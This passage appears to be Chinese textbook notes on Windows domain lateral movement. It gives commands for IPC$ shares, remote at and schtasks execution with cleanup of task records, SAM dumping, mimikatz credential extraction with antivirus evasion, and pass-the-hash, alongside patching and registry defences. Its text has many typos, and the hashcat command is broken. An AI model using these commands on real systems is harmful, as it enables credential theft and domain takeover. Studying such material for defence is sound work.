第5章域内横向移动分析及防御
域内横向移动投不定在夏杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁(Advanced Persistent Threats,APT中。攻击者会利用该技术,以被攻陷的系统为跳板,访问其他域内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳板机器连接的数据库、域控制器或其他重要资产)。
通过此类攻击手段,攻击者最终可能获取域控制器的访问权限,甚至完全控制基于Windows操作系统的基础设施和与业务相关的关键账户。因此,必须使用强口令来保护特权用户不被用于横向移动攻击,从而避免域内其他机器沦陷。建议系统管理员定期修改密码,从而使攻击者获取的权限失效。
常用Windows远程连接和相关命令
1.IPC
IPC( Internet Process Connection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC 可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。
通过 ipc$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载操作 还可以在日标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。
首先,需要建立一个ipc$输入以下命令
C:\Users\Administrator> net use \\1.1.1.10\ipc$ "123456Aa" /user:Administrator
然后在命令行环境下输入命令net use,查看当前的连接
net use
ipc$的利用条件
(1)开启了139、445端
ipc$可以实现远程登录及对默认共享资源的访问,而139端口的开启表示NetBIOS协议的应用。通过139、445 (Window 2000)端口,可以实现对共享文件/打印机的访问。因此,一般来讲,ipc$需要139、445端口的支持。
(2)管理员开启了默认共享
默认共享是为了方便管理员进行远程管理而默认开启的,包括所有的逻辑盘(c$、d$、e$等)和系统目录 winnt或 windows(admin$)。通过 ipc$,可以实现对这些默认共享目录的访问。
2.使用Windows自带的工具获取远程主机信息
dir命令
在使用net use命令与远程目标机器建立ipc$后,可以使用dir命令列出远程主机中的文件
dir \\1.1.1.8\c$tasklist命令
在使用net use命令与远程目标机器建立ipc$后,可以使用tasklist命令的/S、/U、 /P参数列出远程主机上运行的进程
tasklist /S 1.1.1.10 /U Administrator /P 123456Aa3.计划任务
at命令
at是Windows自带的用于创建计划任务的命令,它主要工作在Windows Sever 2008之前版本的操作系统中。使用at命令在远程目标机器上创建计划任务的流程大致如下。
- 使用net time命令确定远程机器当前的系统时间。
- 使用copy命令将Payload 文件复制到远程目标机器中。
- 使用at命令定时启动该Payload文件。
- 删除使用at命令创建计划任务的记录。
在使用at命令在远程机器上创建计划任务之前,需要使用net use命令建立ipc$。
(1)查看目标系统时间
net time命令可用于查看远程主机的系统时间。
net time \\1.1.1.8(2)将文件复制到目标系统中
首先,在本地创建一个calc.bat文件,其内容为“calc”。然后,让 Windows运行一个“计算器“程序,使用Windows自带的copy命令将一个文件复制到远程主机的C盘中。命令如下
copy calc.bat \\1.1.1.8\C$(3)使用at创建计划任务
使用net time命令获取当前远程主机的系统时间。使用at命令让目标系统在指定时间运行一个程序
at \\1.1.1.10 4:10PM C:\calc.bat(4)清除at记录
计划任务不会随着它本身的执行而被删除,因此,网络管理员可以通过攻击者创建的计划任务获知网络遭受了攻击。
at \\1.1.1.10 7 /delete #删除创建的计划任务
使用at远程执行命令后,先将执行结果哦写入本地文本文件,再使用type命令远程读取该文本文件。
at \\1.1.1.10 4:10PM cmd.exe /c "ipconfig" >C:/1.txt"
type \\1.1.1.10\C$\1.txt
schtasks 命令
Windows Vista、Windows Server 2008及之后版本的操作系统已经开始使用schtasks 命令代替at命令。
schtasks /create /s 1.1.1.10 /tn test /sc onstart /tr c:\calc.bat /ru system /f
2.在远程主机上运行名为test的计划任务
schtasks /run /s 1.1.1.10 /i /rn "test"
3.在使用schtasks命令时不需要输入密码,原因是此前已经与目标机器建立了ipc$。如果没有建立ipc$,可以添加参数/u /p
/u administrator
/p "123456Aa"
/f 强制删除
4.任务执行后删除计划任务
schtasks /delete /s 1.1.1.10 /tn "test" -f
5.最后删除ipc$
net use 名称 /del /y #在删除ipc$时,要确认删除的是自己创建的ipc$
在使用schtasks命令时,会在系统中留下日志文件C:\\Windows\Tasks\SchedLgU.txt。如果执行schtasks命令后没有回显,可以配合ipc$执行文件,使用type命令远程查看执行结果。
Windows系统散列值获取分析与防范
Windowus 操作系统通常使用两种方法对用户的明文密码进行加密处理。在域环境中,用户信息存储在ntds.dit中,加密后为散列值。Widows操作系统中的密码般由两部分组成,部分为 LMHash, 另部分为NTLMHash。在Windows操作系统中,Hash的结构通常如下。
username:RID:LM-HASH:NT-HASHLM Hash的全名为“LAN Manager Hash",是微软为了提高Windows操作系统的安全性面采用的散列加密算法,其本质是DES加密。尽管LM Hash较容易被破解,但为了保证系统的兼容性,Windows只是将LMHash禁用了(从Windows Vista 和WindowsSever 2008版本开始,Windows操作系统默认禁用LM Hash )。LM Hash明文密码被限定在14位以内,也就是说,如果要停止使用LM Hash,将用户的密码设置为14位以上即可。如果LM Hash被禁用了,攻击者通过抓取的LM Hash通常为“ab35454a3435451404046“(表示LMHash为空值或被禁用)。
NTLMHash是微软为了在提高安全性的同时保证兼容性而设计的散列加者算法,NTLMHash是基于MD4加密算法进行加密的。个人版从Windows Vista以后,服务器版从Wndows Sever2003以后,Windows 操作系统的认证方式均为NTLM Hash.
单机密码抓取与防范
要想在Windows操作系统中抓取散列值或明文密码,必须将权限提升至Sytem。本地用户名、散列值和其他安全验证信息都保存在SAM文件中。Isass.exe进程用于实现Windows的安全策略(本地安全策略和登录策略)。可以使用工具将散列值和明文密码从内存中的ls.exe 进程或SAM文件中导出。
在Windows操作系统中,SAM文件的保存位置是C:\WindowslSystem32\config.该文件是被锁定的,不允许复制。在渗透测试中,可以采用传统方法,在关闭Windows操作系统之后,使用PE盘进人文件管理环境,直接复制SAM文件,也可以使用VSS等方法进行复制。下面对常见的单机密码抓取工具和方法进行分析,并给出防范建议。
通过SAM和System文件抓取密码
(1)无工具导出SAM文件
reg save hklm\sam sam.hive #通过reg的save选项将注册表中的SAM,System文件导出到本地磁盘
reg save hklm\system system.hive
(2)通过读取SAM和System文件获取NTML Hash
①使用mimikatz读取
lsadump::sam /sam:sam.hive /system:system.hive #文件和mimikatz放在同一目录
②使用cain读取sam文件
③使用mimikatz直接读取本地SAM文件
将mimikatz免杀处理后上传至目标机器,在命令行中打开mimikatz
privilege::debug #提升权限
token::elevate #system权限
lsadump::sam #读取本地SAM文件,获取NTML Hash
使用mimikatz在线读取SAM文件
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" #在线读取散列值及铭文密码
单机密码抓取的防范方法
微软为了防止用户密码在内存中以明文形式泄露,发布了补KB2871997关闭了Wdigest功能。
Windows Server 2012及以上版本默认关闭Wdigest,使攻击者无法从内存中获取明文密码。Windows Server 2012以下版本,如果安装了KB2871997,攻击者同样无法获取明文密码。
在日常网络维护中,通过查看注册表项Wdigest,可以判断Wdigest功能的状态。如果该项的值为1,用户下次登录时,攻击者就能使用工具获取明文密码。应该确保该项的值为0,使用户明文密码不会出现在内存中。
KB2871997:关闭了Wdigest功能,本地账号不再被允许远程接入计算机系统,但系统默认的本地管理员账号Administrator 这个SID为500的用户例外
使hashcat获取密码
hashcat -a 0 -m xx - -a 0:以字典模式破解。
- -m xx:指定
内的散列值类型。 :将多个散列值存入文本,等待破解。 :指定字典文件。
如何防范攻击者抓取明文密码和散列值
1.设置Active Diretory 2012 R2功能级别
Windws Sever 2012R2新增了一个名为“受保护的用户”的用户组。只要将需要保护的用户放人该组,攻击者就无法使用mimikaz等工具抓取明文密码和散列值了。
2.安装KB2871997
KB2871997是微软用来解决PsExec或IPC远程查看(ipc$ )问题的补丁,能使本地账号不再被允许远程接人计算机系统,但系统默认的本地管理员账号Administrator 这个SID为500的用户例外——即使将 Administrator改名,该账号的SID仍为500,攻击者仍然可以使用横向攻击方法获得内网中其他计算机的控制权。安装KB2871997后,仍需禁用默认的Administrator账号,以防御哈希传递攻击。
在日常网络维护中,可以通过Windows update进行自动更新,也可以访同微软官方网站下载补丁文件进行修复。
3.通过修改注册表禁止在内存中存储明文密码
微软在Windows xp版本中台南佳了一个名为WDigest的协议。该协议能够使Windows将明文密码存储在内存中,以方便用户登录本地计算机。
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 #在注册表中添加一个键值,将其设置为0,电脑注销后,windows将不会把密码明文存储在内存中。
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential #查询键值是否添加成功
防御mimikatz攻击
mimikatz在抓取散列值或明文密码时需要使用Debug权限(因为mimikatz需要和Isass进程进行交互,如果没有Debug权限,mimikatz 将不能读取lsass进程)。因此,在维护网络时,可以针对这一点采取防御措施。将拥有Debug权限的本地管理员从Administrators组中删除。
哈希传递攻击分析与防范
散列值:当用户需要登录某网站时,如果该网站使用明文的方式保存用户的密码,那么,一且该网站出现安全漏洞,所有用户的明文密码均会被泄露。由此,产生了散列值的概念。当用户设置密码时,网站服务器会对用户输人的密码进行散列加密处理(通常使用MD5算法)。散列加密算法一般为单向不可逆算法。当用户登录网站时,会先对用户输人的密码进行散列加密处理,再与数据库中存储的散列值进行对比,如果完全相同则表示验证成功。
主流的Windows操作系统,通常会使用NTLM Hash对访问资源的用户进行身份验证。早期版本的Windows操作系统,则使用LM Hash对用户密码进行验证。但是,当密码大于等于15位时,就无法使用LMHash了。从Windows Vista和Windows Server 2008版本开始,Windows 操作系统默认禁用LM Hash,因为在使用NTLM Hash进行身份认证时,不会使用明文口令,而是将明文口令通过系统API (例如LsaLogonUser )转换成散列值。不过,攻击者在获得密码散列值之后,依旧可以使用哈希传递攻击来模拟用户进行认证。
实验1:使用NTLM Hash进行哈希传递
实验环境:远程系统
域名:testlab
IP地址: 1.1.1.10
用户名: Administrator
NTLM Hash:f478e94103927311912ff00846210a30
在目标机器中,以管理员权限运行mimikatz,输人如下命令,
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:testlab /ntlm:f478e94103927311912ff00846210a30 #此时会弹出一个cmd.exe
dir \\dc\c$mimikatz执行后 会弹出一个拥有对应 hash用户权限的 cmd窗口
可看到 弹出 域控的 cmd权限
必须要在目标机器上安装KB28711997,才可以导入AES-256密钥的方式进行横向移动(Pass The Key)
在本实验中需要注意以下几点。
- dir 后跟要使用的主机名,而不是IP地址,否则会提示用户名或密码错误。
- 除了AES-256密钥,AES-128密钥也可以用来进行哈希传递。
- 使用AES密钥对远程主机进行哈希传递的前提是在本地安装KB2871997。
- 如果安装了KB2871997,仍然可以使用SID为500的用户的NTLM Hash进行哈希传递。
- 如果要使用mimikaz的哈希传递功能,需要具有本地管理员权限。这是由mimikatz的实现机制决定的(需要高权限进程lsass.exe的执行权限)。
更新KB2871997补丁产生的影响
微软在2014年5月发布了KB2871997。 该补丁禁止通过本地管理员权限与远程计算机进行连接,其后果就是:无法通过本地管理员对远程计算机使用PsExec, WMI, smbexec, schtasks,也无法访问远程主机的文件共享等。在实际测试中,更新KB2871997后,Administrator账号(SID为500 )例外——使用该账户的散列值依旧可以进行哈希传递。
这里强调的是SID为500的账号。在一些计算机中,即使将Administator改名,也不会影响SID的值。所以,如果攻击者使用SID为500的账号进行横向移动,就不会受到K827197的影响。在实际网络维护中需要特别注意这一点